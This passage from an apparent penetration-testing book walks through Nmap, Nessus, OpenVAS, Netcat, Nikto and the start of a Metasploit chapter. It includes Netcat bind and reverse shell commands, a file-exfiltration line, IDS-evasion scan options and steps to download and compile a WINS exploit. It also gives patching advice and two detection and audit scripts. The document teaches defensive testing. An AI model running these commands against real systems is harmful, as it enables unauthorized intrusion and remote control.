advanced attacker will choose scan settings that keep him from getting caught by spreading that 
noise out. Nmap's timing and performance options do exactly that: they stretch the probes out over 
time and limit how many are sent in parallel, so that rate-based detection does not trigger. 
Remember, a skilled attacker recognizes the benefit of being stealthy and patient. As a rule, the 
slower the scan the more accurate its results; the faster the scan, the less accurate they may be, 
because probes and replies can be dropped, and a dropped reply looks like a filtered port. 

Options that take <time> are in milliseconds unless you append 's' (seconds), 'm' (minutes) or 'h' 
(hours) to the value (e.g. 30m). 


-T<0-5>: Set timing template (higher is faster). 

  -T0 = Paranoid. For IDS evasion. Painfully slow: probes are sent one at a time with a 5 minute 
        wait between them. 
  -T1 = Sneaky. For IDS evasion. Slow: one probe at a time with a 15 second wait between them. 
  -T2 = Polite. One probe at a time with a 0.4 second wait; uses less bandwidth and fewer target 
        resources. 
  -T3 = Normal. The default; probes are sent in parallel. 
  -T4 = Aggressive. Assumes a fast, reliable network and shortens the timeouts. 
  -T5 = Insane. Drastically speeds up the scan at the cost of accuracy; only for very fast 
        networks. 


Example of a command using the timing and performance options: 

root@bt:/pentest# nmap -v -T5 -sS -D 192.168.1.3,192.68.1.43 192.168.22.132 

Summary: 

# nmap -v -PN 192.168.1.1-254                             <-- scan a network range 
# nmap -v -sV 192.168.22.132                               <-- identify services/versions 
# nmap -v -sV -O -f --mtu 16 192.168.22.132                <-- fragment the probes 
# nmap -v -sS -D 192.168.1.3,192.68.1.43 192.168.22.132    <-- decoy scan 
# nmap -v -sS -T5 192.168.1.3                              <-- set the scan speed 
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PortQry 

One important thing to note is that the attacker may not be able to use Nmap. He might not be able 
to bring Nmap into the network, or he may not want to use it because it is easily recognized by IDS 
signatures and antivirus scanners. He may therefore prefer tools that have a smaller footprint, are 
less well known, or are already present on the operating system he is targeting. One such tool is 
PortQry (http://support.microsoft.com/kb/832919), a command-line TCP/IP port scanner from Microsoft 
that ships with the Windows Server 2003 Support Tools. It reports the status of individual TCP and 
UDP ports on a remote machine as LISTENING, NOT LISTENING or FILTERED, and for a few services (such 
as LDAP, SMTP and DNS) it also decodes the reply. It is a small Microsoft executable that antivirus 
products have no reason to flag, and it works against any reachable host on the network. 


Autoscan 


Autoscan (http://autoscan-network.com/) is a quick information-gathering tool included with 
BackTrack; it tells you which hosts are available on the local network, their hostnames and the 
operating system they run, without you having to type any commands. 

You can run it by going to BackTrack > Identify Live Host > Autoscan. 

[Screenshot: AutoScan Network 1.42 main window. The "Local network" list shows five hosts: 
192.168.22.1, 192.168.22.2, 192.168.22.130 (labelled "Agent", the scanning host), 192.168.22.132 
(hostname DEV-v-3) and 192.168.22.254; most are still shown as "## Unknown ##" while fingerprinting 
runs.] 


Nessus 


Once the attacker has fingerprinted the network and identified the host range, the services running 
on each host and their version information, he will want to run a vulnerability scan to see which 
avenues of attack he has against the victim. One tool available for vulnerability scanning is 
Nessus (http://www.nessus.org/), a network vulnerability scanner that checks hosts against a large 
database of known vulnerabilities and misconfigurations. 

Once again, BackTrack 4 is our default platform for hacking tools, as many of the tools needed are 
included in it; it is recommended that you grab the VM. For Nessus to work on Linux you must install 
not only the Nessus client (nessus) but also the Nessus server (nessusd). If you wish to run it on 
Windows, all you have to do is install the latest executable from the Nessus website. To install the 
packaged version, type: 

  sudo apt-get update 
  sudo apt-get install nessus 
  sudo apt-get install nessusd 

It is recommended that you download the latest version of Nessus directly from the website instead, 
because the distribution packages lag well behind the current release. 
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You can also go to http://www.nessus.org/. Grab the 32-bit Nessus i386 .deb file and copy it into 
BackTrack. Use the following command to install it: 

  root@bt:~# dpkg -i /root/Nessus-4.2.2-ubuntu810_i386.deb 

This installs the Nessus scanning engine, but Nessus's real power lies in its plug-ins, each of 
which tests for one vulnerability or gathers one piece of information; the engine only schedules 
and runs them. To start the Nessus server on Linux, type /opt/nessus/sbin/nessusd (or just nessusd, 
depending on the install). To add a user to Nessus so that you can log in and start scanning: 

  root@bt:~# /opt/nessus/sbin/nessus-adduser   (or nessus-adduser) 
  Login: root 
  Login password: pass 
  Login password (again): pass 

Any username will do (it is a Nessus account, not a system account), but pick a strong password if 
the server will accept remote connections: this login controls scans that later run with whatever 
Windows or SSH credentials you give them. Next, register the scanner with the activation code 
obtained from Tenable's website: 

  root@bt:~# /opt/nessus/bin/nessus-fetch --register <activation code> 

The HomeFeed is free and provides the latest plug-in updates, but it may only be used in a home 
environment; commercial use requires the ProfessionalFeed. 


Upgrade the Vulnerability/Plug-ins Database 

To update the vulnerability/plug-in database, use the following command: 

  root@bt:~# /opt/nessus/sbin/nessus-update-plugins 

Or in Windows just grab and install the executable, which is a much easier option: the Nessus 
Server Manager then handles registration and plug-in updates for you. 


[Screenshot: Nessus Server Manager on Windows. Options shown: "Start the Nessus server when Windows 
boots" (the server is started automatically every time the system boots); the registration status 
"Your scanner is registered and can download new plugins from Tenable", with "Clear registration 
file" and "Update plugins" buttons; "Perform a daily plugin update" (the server updates its plug-ins 
every 24 hours); "Allow remote users to connect to this Nessus server"; and the "Stop Nessus Server" 
/ "Start Nessus Server" buttons.] 
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Notice that it lets you update the plug-ins. The plug-ins are what do the actual scanning, so the 
more current they are, the more vulnerabilities you are able to find. 

Nessus 4.2 can be driven in two ways: point a web browser at the server on port 8834 (the built-in 
web interface, which Tenable's Security Center also uses), or run the classic client and point it 
at the server on port 1241. Start the Nessus client by typing 

  /usr/bin/nessus   (or nessus, depending on the install) 

To start scanning from the browser, point it to https://NESSUSIP:8834/. 

Note: make sure you have created a user first, such as user hacker with password pass. One of the 
benefits of using the web interface is that several people, on several computers, can manage the 
vulnerability scanning from the same server. 


Nessus Policies 


In this section you first define how Nessus is going to scan targets in order to find 
vulnerabilities. Notice that Nessus has its own port-scanning capabilities, much like Nmap. An 
attacker can drive Nessus from inside the network through the Nessus bridge, a Metasploit plugin 
that talks to the Nessus server and imports its results into the Metasploit database; he may also 
run it externally. Either way, the primary use of Nessus is to test a given server configuration 
for vulnerabilities so that he knows which exploits to use. 


[Screenshot: the Nessus web interface at https://192.168.22.133:8834/, Policies tab, "Add Policy" 
dialog. The left column lists the policy sections General, Credentials, Plugins and Preferences; 
the General page shows settings such as Port Scanners and Network Congestion, with Cancel and Next 
buttons.] 


Nessus Credentials 


Also notice that Nessus lets you supply credentials as part of a scan. If you have an administrator 
password, or login information for Kerberos or SSH, Nessus can log in and perform much more thorough 
authenticated checks (installed patches, local configuration, file versions) and report far more 
detailed vulnerability information. Without credentials Nessus can only test what is visible over 
the network, which is the same view the attacker has. The next screenshot therefore shows what the 
attacker would see on the network; the same scanner, used with credentials in a test environment, 
shows you which of your server configurations are vulnerable to exploit before he finds out. 
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[Screenshot: Nessus "Add Policy", Credentials page, logged in as user hacker. Credential types 
offered: Windows credentials, SSH settings, Kerberos configuration and Cleartext protocols 
settings; the Windows page takes an SMB account, password and optional domain, with slots for 
additional SMB accounts and passwords.] 


Nessus also lets you choose which plug-ins to scan your targets with. Sometimes it is simplest to 
throw everything at the target and see what is vulnerable, but a full run can crash fragile 
services (the denial-of-service plug-in families in particular can take a server down) and will 
definitely be noisy. The quick but noisy option is to click "Enable All", which in this release 
turns on about 40,000 plug-ins covering thousands of known vulnerabilities. 


[Screenshot: Nessus "Add Policy", Plugins page. Plugin families on the left (for example Ubuntu 
Local Security Checks, VMware ESX Local Security Checks, Web servers, Windows : Microsoft Bulletins, 
Windows : User management); individual plug-ins on the right (7-Zip ARJ File Handling Overflow, 
Absolute Software Computrace LoJack for Laptops, Acer LunchApp.APlunch ActiveX Arbitrary Command 
Execution, activePDF Server < 3.8.6 Packet Handling Remote Overflow, ...) with a description pane 
for "7-Zip < 4.57 Archive Handling Unspecified Issue" (Synopsis: the remote Windows host has a 
program that is affected by an unspecified vulnerability). Footer: Enabled Families: 42, Enabled 
Plugins: 39582, with Enable All / Disable All buttons.] 


Once the scan completes, Nessus summarizes each host with counts of high, medium and low severity 
findings and the number of open ports found. The attacker wants to exploit the vulnerabilities most 
likely to get him into the computer or network, so he focuses on the high-severity findings rather 
than the low-priority ones. 

  Host            Total  High  Medium  Low  Open Ports 
  192.168.22.131     78     0      49   24 
  192.168.22.133     99     9      51   36 

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[Screenshot: per-host detail for 192.168.22.133, listing the services found on the host: epmap, 
netbios-ns, smb, ldap, dfs, kpasswd?, http-rpc-epmap and ldaps?, each with its own finding counts.] 

Once the scan is done Nessus gives a list of ports and the high, medium and low severity 
vulnerabilities associated with each service. The services carrying the vulnerabilities are what 
the attacker is going to target. 


  Plugin ID: 35362     Service: cifs (445/tcp)     Severity: Critical 
  Plugin Name: MS09-001: Microsoft Windows SMB Vulnerabilities Remote Code Execution 

  Synopsis 
  It is possible to crash the remote host due to a flaw in SMB. 

  Description 
  The remote host is affected by a memory corruption vulnerability in SMB that may allow an 
  attacker to execute arbitrary code or perform a denial of service against the remote host. 

  Solution 
  Microsoft has released a set of patches for Windows 2000, XP, 2003, Vista and 2008. 

  CVSS Base Score 
  10.0 (CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C) 


Lastly, you can see that this was a critical (CVSS 10.0) vulnerability in the SMB service on port 
445 of a Microsoft Windows host. It corresponds to Microsoft security bulletin MS09-001, released in 
January 2009. A host that still shows it is not only almost certainly exploitable but has most 
likely never been patched at all, which means every fix released since is probably missing too. 


OpenVAS 


Open Vulnerability Assessment System (OpenVAS; http://www.openvas.org/) is a framework for 
vulnerability scanning that began as a fork of the last open source Nessus release. OpenVAS publishes 
the OpenVAS scanner, which runs network vulnerability tests (NVTs) against targets, and the OpenVAS 
client, which connects to an OpenVAS server holding the plug-in information, much as Nessus works. 

To start the OpenVAS server, navigate to BackTrack > Vulnerability Identification > OPENVAS and 
select OpenVAS Server. First click OpenVAS Cert (or type the command below). This tells OpenVAS to 
create the TLS certificate that clients use to connect to the server for vulnerability scanning; 
you must do this before connecting to the OpenVAS server. 

  root@bt:~# openvas-mkcert 

To create a new OpenVAS user, use the following command: 

  root@bt:~# openvas-adduser 
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To use the OpenVAS client, open it under BackTrack > Vulnerability Identification > OPENVAS > 
OpenVAS Client. To start the OpenVAS daemon from the command line, type the following command: 

  root@bt:~# openvasd 

Plug-in Update 

The NASL plug-ins (the NVTs) contain more than 18,000 network vulnerability tests. To update the 
OpenVAS plug-ins, type root@bt:~# openvas-nvt-sync. 


[Screenshot: OpenVAS-Client connection dialog. Fields: Hostname localhost, Port 9390 (Default); 
Authentication with Login root and a password, or "Authentication by certificate" with a Trusted CA 
file (cacert.pem); Cancel and OK buttons.] 

In this window, when we start OpenVAS, we need to say which user to authenticate as, so make sure 
you have added a user with the openvas-adduser command. Alternatively, you can log in with a client 
certificate created for that user. 


[Screenshot: OpenVAS-Client, Global Settings > Plugin selection. Plug-in families listed include 
AIX Local Security Checks, Backdoors, Brute force attacks, Buffer overflow, CGI abuses, CGI abuses : 
XSS and CISCO; the status line reads "11846 plugins; 11846 enabled", with Enable all / Disable all 
and Expand all / Collapse all buttons, the dependency options "Enable at runtime" and "Silent", 
"Automatically enable new plugins", and a Global NVT Timeout of 320 seconds. Other sections in the 
left pane: Credentials, Target selection, Access Rules, Prefs. Connection: root@localhost.] 


Research Time: Finding the Vulnerabilities m 247 


OpenVAS is very similar to Nessus, and as with Nessus you designate which plug-ins to run against 
the target systems. The easiest way to do a comprehensive scan is to enable them all, but this can 
take a very long time to complete. You also have the ability to enter credentials for more thorough 
authenticated scanning. 


Scan Assistant 

[Screenshot: OpenVAS-Client Scan Assistant, Step 3: Targets (the steps are Task, Scope, Targets and 
Execute). The dialog explains that targets are the hosts and networks to scan in this scope and 
accepts the following formats: 
  - a simple hostname (for hosts in your LAN) 
  - a fully qualified host name (e.g. www.example.com) 
  - an IP address (e.g. 192.168.0.1) 
  - an IP network (e.g. 192.168.0.0/24 or 192.168.0.0/255.255.255.0) 
Several targets can be entered separated by commas; here the target entered is 192.168.1.131. The 
dialog warns: "Please make sure you are allowed to scan these hosts! Harmful checks are disabled by 
default, but some computers and especially print servers have bugs which might crash them. Consider 
getting a written permission before scanning important servers which are in production."] 

Once you are in the Scan Assistant, make sure you select the targets you want to scan. Then click 
Forward again and your vulnerability scan should execute immediately. The warning in the dialog is 
worth taking seriously: a vulnerability scan is not passive, and written authorization is what 
separates an assessment from an attack. 


[Screenshot: OpenVAS-Client report view. The left pane organizes work by Company 1 / TARGET 1 / 
Report 20101102-010109 and Company 2 / TARGET 2 / Report 20101102-010556. For host 192.168.22.133 
the findings are grouped by port: microsoft-ds (445/tcp) carries a red security hole, MS08-067; the 
other entries are netbios-ns (137/udp), epmap (135/tcp), unknown (1028/tcp), netbios-ssn (139/tcp), 
netarx (1040/tcp), neod2 (1048/tcp), msft-gc-ssl (3269/tcp), ldaps (636/tcp), cap (1026/tcp), 
blackjack (1025/tcp), domain (53/tcp), general/tcp and general/SMBClient. The selected NVT is 
"Vulnerability in Server Service Could Allow Remote Code Execution". Overview: this host has a 
critical security update missing according to Microsoft Bulletin MS08-067. Vulnerability Insight: 
the flaw is due to an error in the Server Service, which does not properly handle specially crafted 
RPC requests. Impact: successful exploitation could allow remote attackers to take complete control 
of an affected system; variants of the Conficker worm are based on this vulnerability (see 
http://technet.microsoft.com/en-us/security/dd452420.aspx). Affected Software/OS: Windows 2000 SP4 
and prior, Windows XP SP3 and prior, Windows 2003 SP2 and prior. Fix: run Windows Update or install 
the hotfixes listed in the advisory. Impact Level: System. Scan took place from Tue Nov 2 01:04:59 
2010 to Tue Nov 2 01:05:56 2010.] 

Notice that this tool is also very good for organizing scans against multiple enterprises, networks 
and hosts. As you can see, it flags a red security hole on port 445 of the Windows box and links it 
to the Microsoft security bulletin (MS08-067) that describes the vulnerability; this is the bug 
Conficker spread through, and reliable public exploits for it exist. The tool can also export the 
scan results. Using more than one vulnerability scanner is important for attackers and defenders 
alike, because different scanners have different plug-ins and detect different vulnerabilities, 
which gives the attacker a wider set of avenues of attack and the defender a more complete picture. 
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The best way to defend against vulnerabilities is to patch your system with the latest patches! 
However, one of the best ways to defend your network is to perform your own vulnerability assess- 
ment against your IT infrastructure—that way you can mitigate those vulnerabilities found and 
improve the security posture of your organization. 


Netcat 


Netcat (http://netcat.sourceforge.net/) is a free and open source tool for reading and writing raw 
data over TCP or UDP connections. Attackers frequently use it to move data out of a network, for 
banner grabbing, and even for setting up command and control channels. In this chapter we are mainly 
concerned with using it as an information-gathering tool. 

Connecting with Netcat: 

  nc TARGETIP PORT 

Listening with Netcat: 

  nc -l -p PORT 

Notice that we can couple this tool with Nmap: Nmap tells us which ports on a host are open, and 
Netcat lets us talk to each of those services by hand. 


[Screenshot: a BackTrack shell session in which Nmap is started against the target on 2010-11-01 at 
21:56 EDT.] 


Port Scanning with Netcat 


The attacker can use Netcat to tell quickly which ports are open on a given target. This is a very 
useful way to gather information on hosts, especially when the attacker is already resident inside a 
network and cannot upload Nmap onto the machine he is working from. The -z option makes Netcat 
connect and then close without sending any data (zero-I/O mode), -n skips DNS lookups, -v reports 
each result and -w 1 limits each attempt to one second: 

  nc -v -n -z -w 1 TARGETIP STARTPORT-ENDPORT 

  root@bt:~# nc -v -n -z -w 1 192.168.22.133 1-500 
  (UNKNOWN) [192.168.22.133] 464 (kpasswd) open 
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  (UNKNOWN) [192.168.22.133] 389 (ldap) open 
  (UNKNOWN) [192.168.22.133] 139 (netbios-ssn) open 
  (UNKNOWN) [192.168.22.133] 135 (loc-srv) open 
  (UNKNOWN) [192.168.22.133] 88 (kerberos) open 
  (UNKNOWN) [192.168.22.133] 53 (domain) open 

In this example, notice how Netcat, like Nmap, can be used as a port scanner to identify which 
ports are open on a target. It works through the range from the highest port down, and because it 
completes the TCP connection, every probe is visible to the service, unlike a SYN scan. 
To grab a TCP banner:

■ echo "" | nc -v -n -w1 TARGETIP STARTPORT-ENDPORT
■ root@bt:~# echo "" | nc -v -n -w1 192.168.22.131 1-2000


Sample output:

root@bt:~# echo "" | nc -v -n -w1 192.168.22.131 1-2000
(UNKNOWN) [192.168.22.131] 995 (pop3s) open
(UNKNOWN) [192.168.22.131] 993 (imaps) open
(UNKNOWN) [192.168.22.131] 143 (imap2) open
* OK [CAPABILITY IMAP4rev1 LITERAL+ SASL-IR LOGIN-REFERRALS ID ENABLE STARTTLS LOGINDISABLED] Dovecot ready.
* BAD Error in IMAP command received by server.
^C


As this example shows, depending on the protocol, Netcat lets the hacker gather information on the service listening behind a port by grabbing the banner that service sends back.
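The sweep and banner-grab commands above both leave the same trace on the target side: one source address touching many destination ports within seconds. The following detection logic is an added example (not from the book) that finds that pattern in iptables-style kernel log lines; the log format, the thresholds and the sample lines are assumptions constructed for the example.

```python
"""Flag the footprint of `nc -v -n -z -w 1 TARGET 1-500` style sweeps in firewall logs.

Added example, not from the book. Assumptions: the lines are iptables-style
kernel log messages carrying SRC=, DST= and DPT= fields behind a
"YYYY-MM-DD HH:MM:SS" timestamp; the thresholds below are a starting point.
"""
import re
from collections import defaultdict
from datetime import datetime

LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}) .*?"
    r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+) .*?DPT=(?P<dpt>\d+)"
)


def parse_line(line):
    """Return (timestamp, src, dst, dport) or None for lines without those fields."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    ts = datetime.strptime(m.group("ts"), "%Y-%m-%d %H:%M:%S")
    return ts, m.group("src"), m.group("dst"), int(m.group("dpt"))


def find_sweeps(lines, min_ports=10, window_s=60):
    """Return {(src, dst): sorted distinct ports} for every source/destination
    pair that touched at least min_ports distinct destination ports inside some
    window_s-second window. A single nc -z pass over 1-500 hits hundreds of ports
    in a few seconds, so it trips this easily; two browser connections do not."""
    hits = defaultdict(list)
    for line in lines:
        parsed = parse_line(line)
        if parsed is not None:
            ts, src, dst, dport = parsed
            hits[(src, dst)].append((ts, dport))

    sweeps = {}
    for pair, events in hits.items():
        events.sort()
        lo = 0
        for hi in range(len(events)):
            # Slide the window so events[lo..hi] all fall within window_s seconds.
            while (events[hi][0] - events[lo][0]).total_seconds() > window_s:
                lo += 1
            if len({p for _, p in events[lo:hi + 1]}) >= min_ports:
                sweeps[pair] = sorted({p for _, p in events})
                break
    return sweeps


# Constructed sample log: one sweep of a dozen ports in 12 seconds, then two
# ordinary connections from a different host a quarter of an hour later.
SAMPLE_LOG = [
    f"2010-11-01 21:56:{i:02d} kernel: IN=eth0 OUT= SRC=192.168.22.1 DST=192.168.22.133 "
    f"PROTO=TCP SPT={40000 + i} DPT={port} SYN"
    for i, port in enumerate([21, 22, 23, 25, 53, 80, 88, 135, 139, 389, 443, 464])
] + [
    "2010-11-01 22:10:00 kernel: IN=eth0 OUT= SRC=192.168.22.7 DST=192.168.22.133 "
    "PROTO=TCP SPT=51000 DPT=80 SYN",
    "2010-11-01 22:10:30 kernel: IN=eth0 OUT= SRC=192.168.22.7 DST=192.168.22.133 "
    "PROTO=TCP SPT=51001 DPT=443 SYN",
    "2010-11-01 22:11:00 kernel: martian source 10.0.0.1 from 10.0.0.2",  # no DPT field
]

if __name__ == "__main__":
    for (src, dst), ports in find_sweeps(SAMPLE_LOG).items():
        print(f"sweep: {src} -> {dst}, {len(ports)} ports ({ports[0]}-{ports[-1]})")
```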

To push information to a file, use

■ nc -l -p PORT > FILENAME

Netcat also gives you the ability to push information to a file if needed; this is important for exfiltrating information or for further direct research.
To create backdoor shells:

■ nc -l -p PORT -e /bin/bash    ← Linux
■ nc -l -p PORT -e cmd.exe      ← Windows

Netcat also gives you the ability to create a backdoor shell that you can connect to in order to command and control a computer.

To send out a reverse shell:

■ nc IPADDRESS PORT -e /bin/bash
■ nc IPADDRESS PORT -e cmd.exe

Netcat also gives you the ability to act as a reverse backdoor; this means that Netcat will beacon out to a designated IP address and port and hand over a command prompt. Netcat is a system administration tool. It does, however, often get picked up by antivirus.
Nikto

Nikto is a web server scanning tool that is primarily used to find vulnerabilities on web servers. Nikto can be used to check for dangerous files, outdated versions, vulnerabilities, or poor configuration. Nikto is included on the latest version of BackTrack.

To install the latest version of Nikto on Ubuntu/BackTrack, type

■ sudo apt-get install nikto

Once you grab Nikto, make sure you have the latest updates that are available by typing the following command:

./nikto -update

To run a web scan using Nikto from a Linux command shell:

■ root@bt:/pentest/scanners/nikto# ./nikto.pl -host


[Screenshot: Nikto v2.1 running in a Konsole shell (root@bt:/pentest/scanners/nikto). The output lists the target IP, hostname, port and start time, reports "Server: No banner", notes that robots.txt contains entries which should be manually viewed, warns that the server's reported version string differs from the one in the database (which may cause false positives), and then prints OSVDB findings: an internal IP address or hostname revealed in the Location header, phpWebFileManager v2.0.0 and prior being vulnerable, myphpnuke cross-site scripting (XSS) findings referencing http://www.cert.org/advisories/CA-2000-02.html, and a Web Wiz Forum check.]


Notice that this scans for common vulnerabilities and exposures on a web server. One of the first things that hackers look for is a robots.txt file. A robots.txt file is put in the root of a web server directory to prevent bots such as Google and various web crawlers from crawling the website and making it searchable.

Also notice that it looks for common vulnerabilities; for example, it tests for cross-site scripting capability, which is another initial vector where the hacker can try to hook individuals.
Here is a sample line of output and a solution to secure the system:

+ OSVDB-2722: /bytehoard/index.php?infolder=../../../../../../../../../../etc/: ByteHoard 0.7 is vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher.

Also notice that this tests against the OSVDB, the open source vulnerability database located at http://osvdb.org/. This is another good resource for finding vulnerabilities on targets. The OSVDB recently passed 60,000 database entries.

Once again the best way to defend against vulnerability scanning is to patch your systems! However, it is also important to configure your servers against a configuration guide. The National Institute of Standards and Technology actually makes recommendations for proper security deployment. Go to http://csrc.nist.gov/publications/PubsSPs.html for more information.

Next, it is extremely important to run this scanning tool against your servers or have a penetration test done, to see what exposure and vulnerabilities exist on your servers. Once the scan is done, you can start patching and fixing these vulnerabilities and exposures. This is why organizations have penetration tests done.

To make sure your robots.txt file is secure and it doesn't give up the entire web structure of your website, make sure that if you have a robots.txt file it contains a *. This will prevent your entire website from being indexed, and prevent hackers from learning the directory structure of your website from it.

User-agent: *
Disallow: /
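To check a robots.txt file against the advice above, here is an added example (not from the book) in Python: it parses the file's User-agent and Disallow records, reports whether a blanket Disallow: / applies to all agents, and lists every specific path a Disallow line gives away; the two sample files are constructed.

```python
"""Audit a robots.txt the way the text recommends: a single "Disallow: /" for
all agents, rather than a list of directories that maps out the site.

Added example, not from the book; the two sample files below are constructed.
"""


def parse_robots(text):
    """Split robots.txt into records: a list of (agents, rules) where agents is
    the list of User-agent values and rules is a list of (field, path) tuples
    for the Allow/Disallow lines that follow them. Comments and blank lines are
    ignored; field names are case-insensitive, as in the robots.txt convention."""
    records, agents, rules = [], [], []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or ":" not in line:
            continue
        field, _, value = line.partition(":")
        field, value = field.strip().lower(), value.strip()
        if field == "user-agent":
            if rules:  # a User-agent line after rules starts a new record
                records.append((agents, rules))
                agents, rules = [], []
            agents.append(value)
        elif field in ("allow", "disallow"):
            rules.append((field, value))
    if agents or rules:
        records.append((agents, rules))
    return records


def audit_robots(text):
    """Return (blanket, disclosed): blanket is True when a record for
    User-agent: * contains Disallow: /, and disclosed is the list of specific
    paths that any Disallow line reveals to whoever reads the file."""
    blanket = False
    disclosed = []
    for agents, rules in parse_robots(text):
        for field, path in rules:
            if field != "disallow" or not path:
                continue  # "Disallow:" with no path allows everything
            if path == "/":
                blanket = blanket or "*" in agents
            else:
                disclosed.append(path)
    return blanket, disclosed


# Constructed samples: the recommended file, and one that maps out the site.
ROBOTS_RECOMMENDED = "User-agent: *\nDisallow: /\n"
ROBOTS_LEAKY = """# keep the crawlers out of the sensitive bits
User-agent: *
Disallow: /admin/
Disallow: /backup/
Disallow: /phpmyadmin/

User-agent: Googlebot
Allow: /public/
Disallow: /
"""

if __name__ == "__main__":
    for name, text in (("recommended", ROBOTS_RECOMMENDED), ("leaky", ROBOTS_LEAKY)):
        blanket, disclosed = audit_robots(text)
        print(f"{name}: blanket Disallow for * = {blanket}, disclosed paths = {disclosed}")
```

The audit only inventories what the file reveals; robots.txt is a request that well-behaved crawlers honor, so the listed paths still need real access control.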


Summary 


From this chapter, remember it's all about how hackers go about finding the vulnerabilities they learn of from their research and exploiting the targets they wish to attack. Once again, if they are able to obtain the research that they need discreetly without getting noticed, then they will be highly successful in their attack because they were able to find specific vulnerabilities to exploit. Direct methods available to the hacker gather much more beneficial and exact information on the target but also increase his likelihood of getting caught by creating much more robust digital footprints across the network. However, that is the sacrifice of finding the information needed to exploit a particular system.


Chapter 10 


Metasploit 


Introduction 


If someone you meet tells you that they are a hacker, the first question you should ask them is 
“What do you know about Metasploit?” If they are unfamiliar with Metasploit, odds are they 
have never hacked anything in their life. While the previous statement may have been a bit of an 
exaggeration, I do feel that any hacker or security professional should have been exposed to and 
used Metasploit at some time. You do not have to hack anyone to use the product. Set up a virtual 
machine (VM) with an unpatched operating system (OS) without antivirus or a firewall. Once 
you become more familiar with using Metasploit, you can practice against VMs that are fully 
patched with antivirus and their firewalls enabled. 

The fact that Metasploit causes your antivirus program to get agitated is a very good rea- 
son to consider using the framework on a Linux, Unix, or Mac platform. Another option is to 
consider using the version of Metasploit that comes included with BackTrack. Although it is 
convenient to use the Metasploit that comes with BackTrack, Metasploit works well on any ver- 
sion of Ubuntu. 

The current version of Metasploit, framework 3, is written in Ruby. The older framework, 2, was written in Perl. There are several components to Metasploit, including msfconsole, msfgui, msfweb, msfencode, msfcli, and msfpayload. We will spend most of this chapter concentrating on msfconsole and msfpayload. Both msfweb and msfgui have been phased out in some versions of Metasploit, although I have had some luck getting both of those products to work successfully.
[Screenshot: the msfconsole banner in a Konsole shell at root@bt:/pentest/exploits/framework3, reporting 617 exploits - 306 auxiliary, 215 payloads - 27 encoders - 8 nops, svn r10857 updated today (2010.11.01).]


When you first start using a program like Metasploit, it is a good idea to run your attack in a virtual environment. This way, no one gets upset about having their system attacked. You can download VMware Player or Server for free, and you can also download Microsoft Virtual PC and VirtualBox for free. Use whichever software you are comfortable with to run your VMs. I will be using VMware, which is widely used and easy to use for people new to VMware environments.

For now, start by using two VMs, one as an attack machine and one as the victim. Using a Microsoft OS as the victim machine works well because the large majority of people are most comfortable in the Windows environment. XP also makes a good victim, especially if it has SP0 or SP1 (there are also plenty of exploits for SP2 and SP3). While Windows 2003 can be used as a victim for some exploits, Windows 2000 makes an even better victim because it has no built-in firewall and has many unnecessary services installed and running by default. The people at Metasploit have also put together a Linux VM called Metasploitable that you can launch your attacks against. It can be downloaded at www.metasploit.com/express/community via a BitTorrent client like Vuze.

The latest BackTrack VM can be downloaded at http://www.backtrack-linux.org/downloads. Hopefully, you have a high-speed connection; otherwise the 2500 MB download may take quite a while. Once you download the file, unzip it with 7-zip and open the VMX file with your version of VMware (or just double click on it). You do not have to log in to the newest version of BackTrack, but you will need to type startx to launch the graphical user interface (GUI). If the default screen resolution does not suit you, you can type xrandr -s 1024x768 to set the resolution.

Before you do any type of attacking, set your IP address, default gateway, and domain name 
system (DNS) on your BackTrack machine by typing dhclient. The dhclient command will 
configure your network settings automatically. In some specific situations there is a requirement 
to manually set your IP address, default gateway, and DNS server. The IP address, default gate- 
way, and DNS server you use will depend on your network’s environment. My environment is 
a typical one for a home environment, using a Linksys router. The DNS address used is from 
www.opendns.com, and should work for you regardless of your situation. To manually set your 
address, type the following: 
■ ifconfig eth0 192.168.1.100 netmask 255.255.255.0 up
■ route add default gw 192.168.1.1
■ echo nameserver 208.67.222.222 > /etc/resolv.conf


Whether you set your IP address using dhclient or manually, you need to test it. To test it, either open up Firefox and connect to Google or type ping www.google.com -c 1.

After your IP address has been set, it is a good idea to run the msfupdate command from the 
terminal before you start. This will ensure you have the latest exploits and payloads. BackTrack 
has a program called Conky that will provide your central processing unit (CPU) and RAM 
monitoring, external and internal IP address information, and other vital statistics. Type conky 
at the terminal and the real-time monitoring program will appear on the right side of your screen. 


The msfconsole is an easy-to-use interface that is ideal for individuals who are learning to use 
Metasploit. To start the msfconsole environment, open a terminal window and type msfconsole. 


Note: In previous versions of BackTrack, ./msfconsole needed to be typed from the /pentest/exploits/framework3 directory. To see what Metasploit has to offer you, type the command show all at the msf terminal. Metasploit has the following components:


■ Auxiliary modules
■ Encoders
■ Exploits
■ NOP generators
■ Payloads
■ Plug-ins


To see more details about a specific item, like exploits, type show exploits. Metasploit has exploits 
for Windows, Mac OS X, Linux, and Unix. 


[Screenshot: the output of show exploits in msfconsole (root@bt:/pentest/exploits/framework3).]


The exploit columns include the name of the exploit and its disclosure date, rank (rating), and description. For a more detailed description of the exploit, type info followed by the exploit name. The info screen will also provide you with web links to vulnerability reports and exploitable code.


[Screenshot: the output of info for an exploit in msfconsole.]


One of the references for the exploit is the www.securityfocus.com website. This is a great 
website that allows you to search from a list of software vendors and find corresponding vul- 
nerabilities. SecurityFocus provides you with detailed explanations about the particular vul- 
nerability and in some cases the ability to download code that can be tested against unpatched 
systems. The downloadable code can come in various formats including .exe files in some cases. 
[Screenshot: Internet Explorer showing the SecurityFocus (www.securityfocus.com) page "Microsoft Windows WINS Association Context Data Remote Memory Corruption Vulnerability" (Symantec Connect), with the tabs info, discussion, exploit, solution and references. The exploit tab reads:]

Immunitysec have developed a working commercial exploit for their CANVAS product. This exploit is not otherwise publicly available or known to be circulating in the wild.

CORE have developed a working commercial exploit for their IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

Exploit has been released. 101-WINS-v3.cpp is an improved version of 101_WINS.cpp.


In the case of this specific exploit, the exploit is written in C and must be compiled to be usable. Download the C code to a machine with a GCC compiler like BackTrack. Open a terminal and type the following commands to download and compile the exploit written in C:

1. wget http://www.securityfocus.com/data/vulnerabilities/exploits/wins.c
2. gcc wins.c -o wins.fun
3. ./wins.fun


